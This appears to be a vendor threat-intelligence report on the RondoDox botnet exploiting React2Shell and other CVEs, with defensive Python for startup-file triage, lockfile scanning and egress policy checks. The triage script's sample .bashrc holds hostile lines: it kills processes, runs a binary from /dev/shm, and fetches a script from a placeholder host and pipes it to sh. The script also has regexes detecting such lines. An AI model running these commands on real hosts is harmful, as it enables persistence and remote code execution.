Executive Summary
Between March and December 2025, the RondoDox botnet ran a broad exploitation campaign, most recently weaponizing the critical React2Shell vulnerability (CVE-2025-55182) to compromise over 90,000 Internet of Things (IoT) devices and web servers worldwide, with the largest concentration in the U.S. The attackers worked in phases: reconnaissance and mass scanning first, then automated deployment of Mirai-based payloads and cryptocurrency miners. Once remote code execution was achieved, the RondoDox loader established persistence, killed rival malware, and opened command-and-control (C2) channels for further lateral movement and resource hijacking.
This campaign highlights an alarming trend: botnets now weaponize newly disclosed vulnerabilities in widely used frameworks such as React and Next.js within days of publication, amplifying organizational and regulatory risk across hybrid and IoT environments. Increasingly sophisticated persistence mechanisms and deliberate east-west movement underscore the need for robust segmentation, continuous monitoring, and zero trust enforcement.
Why This Matters Now
This incident shows how quickly botnets exploit unpatched critical vulnerabilities to enroll large fleets of IoT devices and web infrastructure. The urgency is heightened by the tens of thousands of devices that remain vulnerable, the growing use of cryptomining as the monetization of choice, and the accelerating development of automated exploit kits aimed at popular cloud-native stacks.
Attack Path Analysis
Attackers first exploited React2Shell (CVE-2025-55182) for remote code execution on exposed IoT devices and web servers. After compromise, malicious scripts established persistence, removed competing malware, and escalated privileges where needed to keep control and stay undetected. The malware then moved laterally within internal IoT networks in search of vulnerable adjacent workloads, and infected devices connected to RondoDox C2 infrastructure for remote management, payload updates, and further instructions. Although the primary goal was resource hijacking for cryptomining, the bots could also exfiltrate environment or runtime data over the same outbound channels. The net effect was sustained hijacking of device compute and disruption of legitimate services through constant process suppression, cryptomining, and botnet participation.
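Much of what the attack path describes after initial access (persistence through shell startup files, killing competing processes, staging binaries in world-writable directories) leaves traces in a handful of host files. The triage script below is an added example written for this page; it is not tooling from the page's sources or from any RondoDox analysis. Its rules are generic heuristics for the ATT&CK techniques mapped later in this report, not published RondoDox indicators, and the sample .bashrc content it scans is constructed (the /dev/shm path, the minerd process name and the example.invalid host are placeholders).

```python
import os
import re

# Heuristic rules for the kind of line an attacker appends to a shell startup
# file. Names follow the ATT&CK techniques mapped in this report (T1546.004
# shell configuration modification, T1562.001 impair defenses). These are
# illustrative heuristics, not published RondoDox indicators.
RULES = [
    ("exec_from_tmp", re.compile(r"(^|[\s;&|(])(/tmp|/dev/shm|/var/tmp)/\S+")),
    ("download_and_run", re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(sh|bash)\b")),
    ("hidden_background", re.compile(r"\bnohup\b.*&\s*$|\bsetsid\b")),
    ("decode_payload", re.compile(r"\bbase64\s+(-d|--decode)\b")),
    ("kills_processes", re.compile(r"\b(pkill|killall)\b|\bkill\s+-9\b")),
    ("lock_file", re.compile(r"\bchattr\s+\+i\b")),
]

# Startup files that run on every login or new shell; '~' is expanded at scan time.
STARTUP_FILES = ["/etc/profile", "/etc/bash.bashrc", "/etc/rc.local",
                 "~/.bashrc", "~/.bash_profile", "~/.profile"]


def triage_text(text, source="<text>"):
    """Return one finding per non-comment line that trips at least one rule."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        hits = [name for name, rx in RULES if rx.search(stripped)]
        if hits:
            findings.append({"source": source, "line": lineno,
                             "rules": hits, "text": stripped})
    return findings


def triage_files(paths=STARTUP_FILES):
    """Scan the real startup files that exist; unreadable files are skipped."""
    findings = []
    for p in paths:
        full = os.path.expanduser(p)
        try:
            with open(full, encoding="utf-8", errors="replace") as fh:
                findings.extend(triage_text(fh.read(), full))
        except OSError:
            continue
    return findings


# Constructed sample ~/.bashrc: three benign lines followed by the pattern the
# attack path describes (kill rivals, run a dropper from /dev/shm, fetch more).
SAMPLE_BASHRC = """\
# ~/.bashrc: executed by bash(1) for non-login shells.
export PATH="$HOME/.local/bin:$PATH"
alias ll='ls -alF'
pkill -9 -f minerd >/dev/null 2>&1
nohup /dev/shm/.x/bot >/dev/null 2>&1 &
(curl -s http://example.invalid/i.sh || wget -qO- http://example.invalid/i.sh) | sh
"""


if __name__ == "__main__":
    for f in triage_text(SAMPLE_BASHRC, "~/.bashrc (sample)") + triage_files():
        print(f"{f['source']}:{f['line']} [{', '.join(f['rules'])}] {f['text']}")
```

Run it on a suspect host as the user whose shell was used, and as root for the /etc files; anything it flags still needs a human to confirm, but a startup file that suddenly kills processes or runs a binary out of /dev/shm is exactly the trace the persistence and rival-removal steps above leave behind.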
Kill Chain Progression
Initial Compromise
Description
Attackers scanned and exploited unpatched React2Shell (CVE-2025-55182) on exposed IoT devices and web servers, achieving remote code execution to gain initial access.
Related CVEs
CVE-2025-55182
CVSS 10.0
A pre-authentication remote code execution vulnerability in React Server Components allows unauthenticated attackers to execute arbitrary code via crafted HTTP requests.
Affected Products:
Meta Platforms, Inc. React Server Components – 19.0.0, 19.1.0, 19.1.1, 19.2.0
Vercel Inc. Next.js – 15.x and 16.x releases that bundle the affected React Server Components runtime (the IBM bulletin cited under Sources names next 15.4.7 as vulnerable)
Exploit Status:
exploited in the wild
CVE-2023-1389
CVSS 8.8
A command injection vulnerability in TP-Link Archer AX21 routers allows remote attackers to execute arbitrary commands via crafted requests.
Affected Products:
TP-Link Archer AX21 – firmware < 1.1.4
Exploit Status:
exploited in the wild
CVE-2025-24893
CVSS 9.8
An unauthenticated remote code execution vulnerability in XWiki allows attackers to execute arbitrary code via crafted requests.
Affected Products:
XWiki XWiki – < 15.10.11, 16.x < 16.4.1
Exploit Status:
exploited in the wild
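A quick way to check whether a deployment ships one of the affected React Server Components versions listed above is to scan its npm lockfile. The script below is an added example, not code from the page's sources or from the React or Next.js projects. It assumes the RSC runtime is installed as one of the react-server-dom-webpack, react-server-dom-parcel or react-server-dom-turbopack packages (the page names only "React Server Components"), and it flags Next.js 15.x and 16.x only for manual review, because Next.js vendors its own copy of that runtime inside the next package, where a lockfile scan cannot see its version. The sample lockfile is constructed.

```python
import json
import re
import sys

# Versions the advisory text above lists as affected. The three package names
# are the npm bindings that ship React Server Components (an assumption of
# this example; the page itself names only "React Server Components").
AFFECTED_RSC_VERSIONS = {"19.0.0", "19.1.0", "19.1.1", "19.2.0"}
RSC_PACKAGES = {
    "react-server-dom-webpack",
    "react-server-dom-parcel",
    "react-server-dom-turbopack",
}
# Next.js vendors its own copy of the RSC runtime inside the `next` package, so
# the lockfile never lists it separately. Flag 15.x/16.x for manual review
# against the Next.js advisory (the cited IBM bulletin names next 15.4.7).
NEXT_REVIEW_MAJORS = {15, 16}


def _package_name(lock_path):
    """'node_modules/a/node_modules/@s/b' -> '@s/b' (lockfile v2/v3 keys)."""
    return lock_path.rsplit("node_modules/", 1)[-1]


def iter_packages(lock):
    """Yield (name, version, path) for every installed package in the lock dict."""
    if "packages" in lock:  # lockfileVersion 2 or 3: flat map keyed by path
        for path, info in lock["packages"].items():
            if path == "":
                continue  # the root project entry, not a dependency
            yield _package_name(path), info.get("version", ""), path
    else:  # lockfileVersion 1: nested 'dependencies' tree
        stack = [("", lock.get("dependencies", {}))]
        while stack:
            parent, deps = stack.pop()
            for name, info in deps.items():
                path = f"{parent}node_modules/{name}"
                yield name, info.get("version", ""), path
                stack.append((path + "/", info.get("dependencies", {})))


def scan_lockfile(lock):
    """Return findings for CVE-2025-55182-relevant packages, in lockfile order."""
    findings = []
    for name, version, path in iter_packages(lock):
        if name in RSC_PACKAGES and version in AFFECTED_RSC_VERSIONS:
            findings.append({"package": name, "version": version,
                             "path": path, "status": "vulnerable"})
        elif name == "next":
            m = re.match(r"(\d+)\.", version)
            if m and int(m.group(1)) in NEXT_REVIEW_MAJORS:
                findings.append({"package": name, "version": version,
                                 "path": path, "status": "review"})
    return findings


# Constructed sample lockfile (not a real project): one vulnerable RSC binding,
# a patched copy nested under another dependency, and a Next.js 15.4.7 entry.
# Plain `react` is deliberately not flagged; the vulnerable code lives in the
# react-server-dom-* packages.
SAMPLE_LOCK = json.loads("""{
  "name": "example-app", "lockfileVersion": 3,
  "packages": {
    "": {"name": "example-app", "version": "1.0.0"},
    "node_modules/react": {"version": "19.2.0"},
    "node_modules/react-server-dom-webpack": {"version": "19.2.0"},
    "node_modules/next": {"version": "15.4.7"},
    "node_modules/some-lib/node_modules/react-server-dom-webpack": {"version": "19.2.1"}
  }
}""")


def main(path=None):
    """Scan the given package-lock.json, or the constructed sample when no path is given."""
    if path is None:
        lock = SAMPLE_LOCK
    else:
        with open(path, encoding="utf-8") as fh:
            lock = json.load(fh)
    findings = scan_lockfile(lock)
    for f in findings:
        print(f"{f['status']:<10} {f['package']}@{f['version']}  ({f['path']})")
    return findings


if __name__ == "__main__":
    main(sys.argv[1] if len(sys.argv) > 1 else None)
```

Run it as `python check_rsc.py package-lock.json` from each application repository; a "vulnerable" line means the RSC binding itself needs upgrading, and a "review" line means the Next.js version has to be compared against Vercel's advisory by hand, since the lockfile does not expose the vendored runtime.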
MITRE ATT&CK® Techniques
Exploit Public-Facing Application
Command and Scripting Interpreter
Application Layer Protocol: Web Protocols
Create Account
Event Triggered Execution: Unix Shell Configuration Modification
Impair Defenses: Disable or Modify Tools
Resource Hijacking
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Patch Management for Security Vulnerabilities
Control ID: 6.3.3
NYDFS 23 NYCRR 500 – Cybersecurity Policy
Control ID: Section 500.03
DORA (Digital Operational Resilience Act) – Protection and Prevention (ICT Risk Management Framework)
Control ID: Article 9
CISA ZTMM 2.0 – Continuous Vulnerability Management
Control ID: Asset/Application Security: Vulnerability and Patch Management
NIS2 Directive – Supply Chain Security and Vulnerability Handling
Control ID: Article 21(2)(d) and 21(2)(e)
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Information Technology/IT
Critical exposure through React Server Components and Next.js applications, requiring immediate patching and zero trust segmentation to prevent botnet enrollment.
Computer Software/Engineering
Direct vulnerability in React/Next.js frameworks enables remote code execution, demanding urgent security updates and east-west traffic monitoring capabilities.
Financial Services
High-value targets for cryptocurrency mining botnets with strict compliance requirements under PCI DSS and NIST frameworks for application security.
Health Care / Life Sciences
IoT medical devices vulnerable to RondoDox botnet exploitation, requiring HIPAA-compliant network segmentation and encrypted traffic protection measures.
Sources
- RondoDox Botnet Exploits Critical React2Shell Flaw to Hijack IoT Devices and Web Servers (The Hacker News): https://thehackernews.com/2026/01/rondodox-botnet-exploits-critical.html
- RondoDox Botnet Exploiting React2Shell Vulnerability (SecurityWeek): https://www.securityweek.com/rondodox-botnet-exploiting-react2shell-vulnerability/
- Security Bulletin: IBM Rhapsody Systems Engineering is using next-15.4.7.tgz which is vulnerable to CVE-2025-55182 (IBM Support): https://www.ibm.com/support/pages/node/7255181
Cloud Native Security Fabric (CNSF) Mitigations and Controls
Applying Zero Trust segmentation, egress policy enforcement, and traffic visibility controls as provided by CNSF would have significantly contained lateral spread, identified anomalous behavior, and blocked command-and-control traffic, thus disrupting the botnet kill chain early.
Control: Cloud Native Security Fabric (CNSF)
Mitigation: Inline distributed enforcement identifies and blocks known exploit patterns at ingress.
Control: Threat Detection & Anomaly Response
Mitigation: Anomaly detection and alerting surface suspicious persistence and runtime modification attempts.
Control: Zero Trust Segmentation
Mitigation: Microsegmentation policies block unauthorized workload-to-workload and east-west movement.
Control: Egress Security & Policy Enforcement
Mitigation: Outbound connections to known malicious C2 endpoints are blocked.
Control: Cloud Firewall (ACF)
Mitigation: Granular firewall policies prevent unauthorized outbound data flows.
Segmentation and monitoring reduce blast radius of compromise and highlight abnormal resource use.
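The egress and segmentation controls above reduce to one question per flow: is this IoT device allowed to talk to that destination on that port? The script below is an added example of that policy check over flow records, written for this page rather than taken from CNSF or any of the sources. The IoT segment, the allowlist, every address and every flow line are constructed for the example, and the stratum-port list is a heuristic hint attached to the reason string, not a verdict.

```python
import ipaddress
from collections import Counter

# Policy for one IoT segment, expressed as an allowlist of (destination
# network, port) pairs. Anything else sourced from IOT_NET is a violation.
# All addresses are constructed for this example.
IOT_NET = ipaddress.ip_network("10.20.0.0/16")
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8")]
ALLOWED = [
    (ipaddress.ip_network("10.10.5.20/32"), 8443),  # device-management service
    (ipaddress.ip_network("10.10.5.53/32"), 53),    # internal DNS resolver
]
# Ports conventionally used by stratum mining pools. A port match only adds a
# hint to the reason string; it is never a verdict on its own.
STRATUM_PORTS = {3333, 4444, 5555, 7777, 14444}


def is_allowed(dst_ip, port):
    return any(dst_ip in net and port == p for net, p in ALLOWED)


def classify(src, dst, port):
    """Return None for a permitted flow, otherwise a short reason string."""
    src_ip, dst_ip = ipaddress.ip_address(src), ipaddress.ip_address(dst)
    if src_ip not in IOT_NET:
        return None  # this policy only scopes the IoT segment
    if is_allowed(dst_ip, port):
        return None
    if any(dst_ip in net for net in INTERNAL_NETS):
        return "east-west: IoT host reaching an internal workload outside the allowlist"
    if port in STRATUM_PORTS:
        return "egress: internet destination on a stratum-style port (possible cryptomining)"
    return "egress: internet destination outside the allowlist (possible C2)"


def evaluate(flow_lines):
    """Parse 'timestamp src dst dport bytes' records; return (alerts, per-source counts)."""
    alerts = []
    for line in flow_lines:
        parts = line.split()
        if len(parts) != 5:
            continue  # malformed record; a real collector would count these
        ts, src, dst, port, nbytes = parts
        reason = classify(src, dst, int(port))
        if reason:
            alerts.append({"ts": ts, "src": src, "dst": dst, "port": int(port),
                           "bytes": int(nbytes), "reason": reason})
    return alerts, Counter(a["src"] for a in alerts)


# Constructed flow records (not real telemetry): two permitted flows, then a
# stratum-port connection, an unexpected HTTPS egress, an SSH attempt into
# another internal subnet, and one flow from outside the IoT segment.
SAMPLE_FLOWS = [
    "2025-12-05T10:00:01Z 10.20.3.14 10.10.5.20 8443 1200",
    "2025-12-05T10:00:02Z 10.20.3.14 10.10.5.53 53 96",
    "2025-12-05T10:00:05Z 10.20.3.14 203.0.113.77 3333 8800",
    "2025-12-05T10:00:07Z 10.20.3.14 198.51.100.9 443 4096",
    "2025-12-05T10:00:09Z 10.20.3.14 10.30.1.5 22 512",
    "2025-12-05T10:00:11Z 10.10.5.20 198.51.100.9 443 700",
]

if __name__ == "__main__":
    alerts, per_src = evaluate(SAMPLE_FLOWS)
    for a in alerts:
        print(f"{a['ts']} {a['src']} -> {a['dst']}:{a['port']}  {a['reason']}")
    for src, n in per_src.most_common():
        print(f"{src}: {n} policy violation(s)")
```

The allowlist is the important design choice: IoT devices that legitimately need a vendor cloud get that destination added explicitly, so an unexpected HTTPS connection is still reported rather than hidden by a blanket "allow 443" rule, and the same check that catches C2 egress catches the east-west SSH attempt the attack path describes.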
Impact at a Glance
Affected Business Functions
- Web Hosting
- E-commerce Platforms
- IoT Device Management
Estimated downtime: 7 days
Estimated loss: $500,000
Potential exposure of sensitive customer data and intellectual property due to unauthorized access and control over compromised servers and IoT devices.
Recommended Actions
Key Takeaways & Next Steps
- Patch all IoT devices and public-facing web applications regularly to close known vulnerabilities like CVE-2025-55182.
- Enforce strict Zero Trust segmentation to isolate IoT and untrusted workloads from critical infrastructure and internal resources.
- Deploy inline egress policy controls to identify and block unauthorized external C2 and exfiltration traffic in real time.
- Implement behavioral anomaly detection and incident response workflows to surface persistence and runtime attacks quickly.
- Leverage centralized cloud-native visibility and policy automation to ensure consistent enforcement and minimize lateral movement opportunities.